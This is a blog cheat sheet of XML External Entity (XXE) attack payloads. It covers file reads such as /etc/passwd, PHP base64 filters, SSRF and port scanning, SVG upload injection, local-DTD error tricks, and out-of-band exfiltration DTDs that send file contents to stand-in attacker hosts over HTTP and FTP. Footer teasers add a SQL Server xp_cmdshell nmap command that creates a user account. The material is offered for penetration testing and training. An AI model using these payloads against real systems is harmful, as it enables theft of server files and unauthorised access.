Skip to main content

XML External Entities - XXE Cheatsheet

 XML External Entity (XXE) attacks are a type of security vulnerability that exploit weaknesses in the processing of XML data. These attacks occur when XML input containing a reference to an external entity is processed by a weakly configured XML parser, allowing an attacker to access the file system, carry out server-side request forgery (SSRF), or even execute remote code. XXE vulnerabilities arise due to dangerous features in the XML specification, which are often enabled in standard parsers. Attackers can leverage these features to perform actions like viewing sensitive files, interacting with back-end systems, or escalating the attack to compromise servers. Preventing XXE requires secure coding practices, such as disabling external entities and using fewer complex data formats.

XXE Detection 
  • Request Body contains '<?xml version="1.0" encoding="UTF-8"?>'
  • Content Type header is 'text/xml'
Basic XXE - add it in the request parameters

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<productId>&xxe;</productId>

#Basic XXE 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "file:///etc/passwd">
%a;
]>

Ways to Encode the Data For Reading/Transferring/Exfiltration - Works only for PHP

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php"file:///etc/passwd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">

XXE TO SSRF

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1/"> ]>
<productId>&xxe;</productId>

#Portscan 
#Intercept the request in burp and scan the ports 0-65535 and filter the response to determine the open port
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8888/"> ]>
<productId>&xxe;</productId>
When Only Parameter Data is being passed into XML 

#set the below query as parameter value
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
XXE using SVG File Upload

- This works when File Upload Accepts SVG files and 
- Content-Type filter accepts 'text/xml'
- Then you can add the XML body to the request 

#Upload a SVG Image, Intercept the request, replace the image content with below 
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

#/etc/hostname content will be displayed in the image

Out of Band XXE 
- Use XML Parameter Entities when regular entities are blocked 
- XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://juhn4dxiscly79brnyvras5cy34usrgg.oastify.com"> ]>
<productId>&xxe;</productId>

# Parameter Entity
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://0st42uvzqtjf5q98lft8893twk2bqaez.oastify.com"> %xxe; ]>
DATA Exfiltration using out of band XXE 
- In this attacker, we are going to host a Web server which contains a dtd file 
- dtd file contains the which file to the accessed and where the contents of the file should be sent
- once we execute our malicious url on the target application, it will respond back with the data mentioned in the dtd file

#Host dtd file on python server
python3 -m http.server 80

#save the contents into exp.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

#Attacking the Application
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://10.10.10.1/exploit"> %xxe;]>

Note:
# If HTTP is not allowed, you can use FTP 
<!ENTITY % file SYSTEM "file:///etc/passwd"> 
<!ENTITY % output "<!ENTITY rrr SYSTEM 'ftp://ATTACKERSERVER:2121/%file;'>">
%output;

If the Server Responds with Error messages

#Host the file
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'file://INVALID/?x=%file;'>">
%eval;
%exfiltrate;

#Run the Exploit
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://10.10.10.1/exploit"> %xxe;]>
When Out of Band Exploitation is not Possible to Exfiltrate Data Because of Egress Filters
Exploiting XXE using Local DTD

- Locate any DTD file available on the server
- Enumerate using file:///etc/passwd - this only works if the server throws some kind of error message
- Common dtd file path is - 
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/xml/fontconfig/fonts.dtd
/usr/share/discover/dtd/conffile.dtd
/usr/share/discover/dtd/discover.dtd
/usr/share/X11/xkb/rules/xkb.dtd

Use this wordlist - dtd_files.txt contains huge list of dtd paths for enumeration
# Find a valid DTD File on the Victim Application Server
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>

#Exploit if path /usr/share/yelp/dtd/docbookx.dtd is available

<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd; ]> #Exploit when the path /usr/share/xml/fontconfig/fonts.dtd is avaialable
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
#Exploit for - /usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd">

    <!ENTITY % Boolean '(aa) #IMPLIED>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ATTLIST attxx aa "bb"'>

    %local_dtd;
]>


Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in